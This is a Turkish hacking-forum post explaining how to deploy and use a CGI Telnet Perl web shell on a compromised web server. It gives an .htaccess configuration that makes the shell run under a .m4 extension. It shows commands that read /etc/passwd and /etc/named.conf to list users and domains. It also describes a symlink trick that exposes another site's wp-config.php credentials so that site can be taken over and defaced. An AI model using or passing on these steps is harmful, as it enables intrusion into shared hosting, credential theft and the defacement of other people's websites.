• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

CGI Telnet

dr4cula

LV
0
 
Katılım
Haz 27, 2019
Mesajlar
22
Tepkime puanı
19
Puanları
3
Oncelikle merhabalar arkadaslar. Halen deliler gibi bypass yapabilen tek tools olan cgi telneti aciklayacagim arkadaslar. Kolay yonu ve serverda cok rahat hareket etmenize saglayan, fazla yer tutmayan bir yazilim. Kim kodladiysa elleri kor oldu.

Oncelikle Cgi Telnet calisma mantigini anlatayim.
/usr/bin/perl komuduyla baslar. Serverda bulunan isletim sisteminden perl komudunu ceker. Bu cogu komut serverda hata almanizi saglayabilir. Ancak #!/usr/bin/perl -I/usr/local/bandmain komuduyla bandmainden alacagindan etkilenmeyecektir. Ya perl'den eger calismaz ise bandmainden alacaktir. Serverda cgitelnet dosyasina chmod 755 vermeyi unutmayin ve hatasiz sekilde suanda calistirmis olduk.
Eger gene calismaz ise su metotlari uygulayin.

.htaccess dosyasi olusturun ve icine sunlari yaziniz.
Kod:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .m4
AddHandler cgi-script .m4
AddHandler cgi-script .m4
bizim yaptigimiz islem suanda .pl dosyasini .m4 dosyasina cevirdik yani bununla itibaren cgitelnet.pl dosyasi cgitelnet.m4 olarak degismis olacaktir. http://hedefsite.com/cgitelnet.m4 yazilsa yeterlidir.

Simdi girelim olaylarimiza.

Simdi arkadaslar oncelikle blogumuzun uzerinde cgitelnet kodlarinin hepsi var.
Ancak basic olarak su sekilde anlatmam lazim serverdaki configi nasil okuruz onu anlatacagim.

cat /etc/passwd komudu serverdaki kullanici adlarini sergiler.
cat /etc/named.conf | grep zone komuduylada domain isimleri sergilenir.
Artik gerisi scriptine gore config cekmekte kaliyor.

Ornegin x.com sitesine cgitelneti soktuk. Ancak biz y.com sitesindeki configi okumak istiyoruz. Kullanici adini cat /etc/passwd komuduyla alinca gerisi dahada kolaylasiyor. Ornegin kullanici adimizda dr4cula olsun. Sitede Wordpress olsun. Config yolu wp-config.php dir.

ln -s /home/dr4cula/public_html/wp-config.php 1.txt olarak config bilgilerini 1.txt dosyasina cekmis bulunduk. Simdi x.com/1.txt dosyasina girip config bilgilerini elde edip MySQL ile baglanip kullanici ve passwordu bulabilir degistirebilir o siteyide deface listesine atabilirsiniz.

Basic anlatimla elimden geldigince anlatmis oldum. Yakinda daha ileri seviye yapilacaklari sizlerle paylasacagim.

Kolay Gelsin.

http://dr4tr.blogspot.com.tr/2016/09/cgi-telnet-kullanimi.html

2016 senesinde spy'a açtığım konudur.
 
Moderatör tarafında düzenlendi:
shape1
shape2
shape3
shape4
shape7
shape8
Üst